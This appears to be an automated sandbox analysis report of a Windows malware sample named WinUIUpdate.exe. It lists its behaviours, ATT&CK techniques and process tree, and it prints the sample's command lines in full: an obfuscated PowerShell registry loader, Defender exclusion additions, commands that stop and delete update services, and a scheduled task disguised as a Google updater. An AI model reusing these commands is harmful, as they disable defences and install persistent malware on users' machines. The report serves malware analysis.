6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04

Resubmissions

20-03-2023 12:07

230320-pad1ssfd7y 10

20-03-2023 09:30

230320-lgw86scg49 10

Analysis

max time kernel
150s
max time network
54s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
20-03-2023 09:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinUIUpdate.exe
Size

3.7MB
MD5

b0a84e4330a9c00c57d3a3e7885f7946
SHA1

bfe5f9b94081c25827e2bc90bb39a8c701033519
SHA256

6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04
SHA512

a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f
SSDEEP

98304:xGUMWoCIILMDNCl6b54+TUyscvBDw4pn:AGosIslo46UF8

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 1556 created 1212	1556	WinUIUpdate.exe	14
PID 1556 created 1212	1556	WinUIUpdate.exe	14
PID 1556 created 1212	1556	WinUIUpdate.exe	14
PID 1556 created 1212	1556	WinUIUpdate.exe	14
PID 1556 created 1212	1556	WinUIUpdate.exe	14
PID 1960 created 420	1960	powershell.EXE	3

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	WinUIUpdate.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1556 set thread context of 284	1556	WinUIUpdate.exe	51
PID 1960 set thread context of 1600	1960	powershell.EXE	57

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\chromeupdater.exe	WinUIUpdate.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
588	sc.exe
1472	sc.exe
1684	sc.exe
940	sc.exe
1536	sc.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1968	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30f78618175bd901	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1556	WinUIUpdate.exe
1556	WinUIUpdate.exe
840	powershell.exe
1556	WinUIUpdate.exe
1556	WinUIUpdate.exe
1556	WinUIUpdate.exe
1556	WinUIUpdate.exe
1556	WinUIUpdate.exe
1556	WinUIUpdate.exe
684	powershell.exe
1556	WinUIUpdate.exe
1556	WinUIUpdate.exe
1960	powershell.EXE
1960	powershell.EXE
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
980	powershell.EXE
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe
1600	dllhost.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	840	powershell.exe
Token: SeShutdownPrivilege	2032	powercfg.exe
Token: SeShutdownPrivilege	1792	powercfg.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeShutdownPrivilege	1680	powercfg.exe
Token: SeShutdownPrivilege	324	powercfg.exe
Token: SeDebugPrivilege	1960	powershell.EXE
Token: SeDebugPrivilege	1960	powershell.EXE
Token: SeDebugPrivilege	1600	dllhost.exe
Token: SeDebugPrivilege	980	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 592 wrote to memory of 2032	592	cmd.exe	37
PID 592 wrote to memory of 2032	592	cmd.exe	37
PID 592 wrote to memory of 2032	592	cmd.exe	37
PID 1924 wrote to memory of 588	1924	cmd.exe	36
PID 1924 wrote to memory of 588	1924	cmd.exe	36
PID 1924 wrote to memory of 588	1924	cmd.exe	36
PID 592 wrote to memory of 1792	592	cmd.exe	38
PID 592 wrote to memory of 1792	592	cmd.exe	38
PID 592 wrote to memory of 1792	592	cmd.exe	38
PID 1924 wrote to memory of 1472	1924	cmd.exe	39
PID 1924 wrote to memory of 1472	1924	cmd.exe	39
PID 1924 wrote to memory of 1472	1924	cmd.exe	39
PID 592 wrote to memory of 1680	592	cmd.exe	40
PID 592 wrote to memory of 1680	592	cmd.exe	40
PID 592 wrote to memory of 1680	592	cmd.exe	40
PID 1924 wrote to memory of 1684	1924	cmd.exe	42
PID 1924 wrote to memory of 1684	1924	cmd.exe	42
PID 1924 wrote to memory of 1684	1924	cmd.exe	42
PID 592 wrote to memory of 324	592	cmd.exe	41
PID 592 wrote to memory of 324	592	cmd.exe	41
PID 592 wrote to memory of 324	592	cmd.exe	41
PID 1924 wrote to memory of 940	1924	cmd.exe	43
PID 1924 wrote to memory of 940	1924	cmd.exe	43
PID 1924 wrote to memory of 940	1924	cmd.exe	43
PID 1924 wrote to memory of 1536	1924	cmd.exe	44
PID 1924 wrote to memory of 1536	1924	cmd.exe	44
PID 1924 wrote to memory of 1536	1924	cmd.exe	44
PID 1924 wrote to memory of 1660	1924	cmd.exe	45
PID 1924 wrote to memory of 1660	1924	cmd.exe	45
PID 1924 wrote to memory of 1660	1924	cmd.exe	45
PID 1924 wrote to memory of 2020	1924	cmd.exe	46
PID 1924 wrote to memory of 2020	1924	cmd.exe	46
PID 1924 wrote to memory of 2020	1924	cmd.exe	46
PID 684 wrote to memory of 1968	684	powershell.exe	47
PID 684 wrote to memory of 1968	684	powershell.exe	47
PID 684 wrote to memory of 1968	684	powershell.exe	47
PID 1924 wrote to memory of 1712	1924	cmd.exe	48
PID 1924 wrote to memory of 1712	1924	cmd.exe	48
PID 1924 wrote to memory of 1712	1924	cmd.exe	48
PID 1924 wrote to memory of 1364	1924	cmd.exe	49
PID 1924 wrote to memory of 1364	1924	cmd.exe	49
PID 1924 wrote to memory of 1364	1924	cmd.exe	49
PID 1924 wrote to memory of 608	1924	cmd.exe	50
PID 1924 wrote to memory of 608	1924	cmd.exe	50
PID 1924 wrote to memory of 608	1924	cmd.exe	50
PID 1556 wrote to memory of 284	1556	WinUIUpdate.exe	51
PID 1528 wrote to memory of 1960	1528	taskeng.exe	53
PID 1528 wrote to memory of 1960	1528	taskeng.exe	53
PID 1528 wrote to memory of 1960	1528	taskeng.exe	53
PID 1528 wrote to memory of 980	1528	taskeng.exe	54
PID 1528 wrote to memory of 980	1528	taskeng.exe	54
PID 1528 wrote to memory of 980	1528	taskeng.exe	54
PID 1528 wrote to memory of 980	1528	taskeng.exe	54
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1960 wrote to memory of 1600	1960	powershell.EXE	57
PID 1600 wrote to memory of 420	1600	dllhost.exe	3

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:280
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:1360
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1068
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1128
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1060
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:616
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:960
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:848
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {07E8A0DB-C9A6-4F32-9E9C-A97A4870564B} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+'W'+''+'A'+''+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+'st'+[Char](97)+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1960
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+'l'+'e'+'rs'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:980
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:808
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:752
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:676
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:600

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{25bac9f5-3b25-47e3-b7f1-9a60afbf05f9}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1600

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:2012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1212
- C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:592
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:324
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:588
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1472
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1684
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:940
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1536
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1660
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:2020
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1712
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1364
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:684
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineUA /tr "'C:\Program Files\Google\Chrome\chromeupdater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1968
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:284

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1180

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-12154296931903486855-2123541791-18345936142027518471694852113-14938323231640187391"
1⤵
PID:1108

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1dcf42a7b9a0e3702709398ce2eafbcb

SHA1
6b3e9982c598e289502a0e08a76e7a2f348d445e

SHA256
595aa81244a551c55b4492cef43f027bd2915069376158ad3fc80928424d8bd0

SHA512
5743d3b084af84bc27e6017dcc1500ce5f1482d976cee6a2aff18d87d889e9da298773f9811c11b1ae5fe4a937d28fb3118be211d89c02e3eb05176002e41500

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5VB74GZ0H1O7UNJ9URXZ.temp

Filesize
7KB

MD5
1dcf42a7b9a0e3702709398ce2eafbcb

SHA1
6b3e9982c598e289502a0e08a76e7a2f348d445e

SHA256
595aa81244a551c55b4492cef43f027bd2915069376158ad3fc80928424d8bd0

SHA512
5743d3b084af84bc27e6017dcc1500ce5f1482d976cee6a2aff18d87d889e9da298773f9811c11b1ae5fe4a937d28fb3118be211d89c02e3eb05176002e41500

Download Submit
memory/280-230-0x00000000007E0000-0x0000000000807000-memory.dmp

Filesize
156KB

Download
memory/280-233-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/284-78-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/420-99-0x00000000008D0000-0x00000000008F7000-memory.dmp

Filesize
156KB

Download
memory/420-104-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/420-95-0x00000000008A0000-0x00000000008C1000-memory.dmp

Filesize
132KB

Download
memory/420-258-0x00000000008D0000-0x00000000008F7000-memory.dmp

Filesize
156KB

Download
memory/420-100-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmp

Filesize
64KB

Download
memory/420-94-0x00000000008A0000-0x00000000008C1000-memory.dmp

Filesize
132KB

Download
memory/464-259-0x00000000001A0000-0x00000000001C7000-memory.dmp

Filesize
156KB

Download
memory/464-106-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmp

Filesize
64KB

Download
memory/464-109-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/464-105-0x00000000001A0000-0x00000000001C7000-memory.dmp

Filesize
156KB

Download
memory/480-112-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmp

Filesize
64KB

Download
memory/480-110-0x0000000000150000-0x0000000000177000-memory.dmp

Filesize
156KB

Download
memory/480-262-0x0000000000150000-0x0000000000177000-memory.dmp

Filesize
156KB

Download
memory/480-115-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/480-116-0x0000000000150000-0x0000000000177000-memory.dmp

Filesize
156KB

Download
memory/488-123-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/488-120-0x0000000000460000-0x0000000000487000-memory.dmp

Filesize
156KB

Download
memory/488-122-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmp

Filesize
64KB

Download
memory/488-140-0x0000000000460000-0x0000000000487000-memory.dmp

Filesize
156KB

Download
memory/600-129-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/600-144-0x0000000000530000-0x0000000000557000-memory.dmp

Filesize
156KB

Download
memory/600-127-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmp

Filesize
64KB

Download
memory/600-124-0x0000000000530000-0x0000000000557000-memory.dmp

Filesize
156KB

Download
memory/616-238-0x0000000001C20000-0x0000000001C47000-memory.dmp

Filesize
156KB

Download
memory/616-239-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/676-133-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmp

Filesize
64KB

Download
memory/676-149-0x0000000000510000-0x0000000000537000-memory.dmp

Filesize
156KB

Download
memory/676-135-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/676-130-0x0000000000510000-0x0000000000537000-memory.dmp

Filesize
156KB

Download
memory/684-73-0x00000000025D0000-0x0000000002650000-memory.dmp

Filesize
512KB

Download
memory/684-74-0x00000000025DB000-0x0000000002612000-memory.dmp

Filesize
220KB

Download
memory/684-71-0x00000000025D0000-0x0000000002650000-memory.dmp

Filesize
512KB

Download
memory/684-69-0x000000001B100000-0x000000001B3E2000-memory.dmp

Filesize
2.9MB

Download
memory/684-70-0x0000000001F80000-0x0000000001F88000-memory.dmp

Filesize
32KB

Download
memory/684-72-0x00000000025D0000-0x0000000002650000-memory.dmp

Filesize
512KB

Download
memory/752-139-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmp

Filesize
64KB

Download
memory/752-152-0x00000000008B0000-0x00000000008D7000-memory.dmp

Filesize
156KB

Download
memory/752-136-0x00000000008B0000-0x00000000008D7000-memory.dmp

Filesize
156KB

Download
memory/752-142-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/808-222-0x00000000008A0000-0x00000000008C7000-memory.dmp

Filesize
156KB

Download
memory/808-151-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/808-148-0x000007FEBEBE0000-0x000007FEBEBF0000-memory.dmp

Filesize
64KB

Download
memory/808-143-0x00000000008A0000-0x00000000008C7000-memory.dmp

Filesize
156KB

Download
memory/840-61-0x00000000026A4000-0x00000000026A7000-memory.dmp

Filesize
12KB

Download
memory/840-60-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/840-62-0x00000000026AB000-0x00000000026E2000-memory.dmp

Filesize
220KB

Download
memory/840-59-0x000000001B140000-0x000000001B422000-memory.dmp

Filesize
2.9MB

Download
memory/848-264-0x0000000000390000-0x00000000003B7000-memory.dmp

Filesize
156KB

Download
memory/848-150-0x0000000000390000-0x00000000003B7000-memory.dmp

Filesize
156KB

Download
memory/848-224-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/848-156-0x0000000000390000-0x00000000003B7000-memory.dmp

Filesize
156KB

Download
memory/960-265-0x0000000000940000-0x0000000000967000-memory.dmp

Filesize
156KB

Download
memory/960-228-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/960-160-0x0000000000940000-0x0000000000967000-memory.dmp

Filesize
156KB

Download
memory/980-257-0x0000000000F40000-0x0000000000F80000-memory.dmp

Filesize
256KB

Download
memory/980-260-0x0000000000F40000-0x0000000000F80000-memory.dmp

Filesize
256KB

Download
memory/980-267-0x0000000000F40000-0x0000000000F80000-memory.dmp

Filesize
256KB

Download
memory/1060-241-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/1060-240-0x00000000008F0000-0x0000000000917000-memory.dmp

Filesize
156KB

Download
memory/1068-250-0x00000000007E0000-0x0000000000807000-memory.dmp

Filesize
156KB

Download
memory/1108-255-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/1108-254-0x0000000000750000-0x0000000000777000-memory.dmp

Filesize
156KB

Download
memory/1128-242-0x0000000001D60000-0x0000000001D87000-memory.dmp

Filesize
156KB

Download
memory/1128-243-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/1180-245-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/1180-244-0x0000000001C70000-0x0000000001C97000-memory.dmp

Filesize
156KB

Download
memory/1212-247-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/1212-246-0x00000000021E0000-0x0000000002207000-memory.dmp

Filesize
156KB

Download
memory/1360-249-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download
memory/1360-248-0x0000000000430000-0x0000000000457000-memory.dmp

Filesize
156KB

Download
memory/1528-256-0x00000000001B0000-0x00000000001D7000-memory.dmp

Filesize
156KB

Download
memory/1556-54-0x000000013F890000-0x000000013FC51000-memory.dmp

Filesize
3.8MB

Download
memory/1556-77-0x000000013F890000-0x000000013FC51000-memory.dmp

Filesize
3.8MB

Download
memory/1600-90-0x0000000077AA0000-0x0000000077BBF000-memory.dmp

Filesize
1.1MB

Download
memory/1600-91-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1600-86-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1600-253-0x0000000000DA0000-0x0000000000DC7000-memory.dmp

Filesize
156KB

Download
memory/1600-88-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1600-89-0x0000000077BC0000-0x0000000077D69000-memory.dmp

Filesize
1.7MB

Download
memory/1960-85-0x0000000077AA0000-0x0000000077BBF000-memory.dmp

Filesize
1.1MB

Download
memory/1960-84-0x0000000077BC0000-0x0000000077D69000-memory.dmp

Filesize
1.7MB

Download
memory/1960-83-0x0000000000FB0000-0x0000000000FD6000-memory.dmp

Filesize
152KB

Download
memory/1960-82-0x00000000009A0000-0x0000000000A20000-memory.dmp

Filesize
512KB

Download
memory/1960-81-0x00000000009A0000-0x0000000000A20000-memory.dmp

Filesize
512KB

Download
memory/1960-80-0x00000000009A0000-0x0000000000A20000-memory.dmp

Filesize
512KB

Download
memory/1960-79-0x0000000000970000-0x0000000000978000-memory.dmp

Filesize
32KB

Download
memory/2012-251-0x0000000000480000-0x00000000004A7000-memory.dmp

Filesize
156KB

Download
memory/2012-252-0x0000000037C00000-0x0000000037C10000-memory.dmp

Filesize
64KB

Download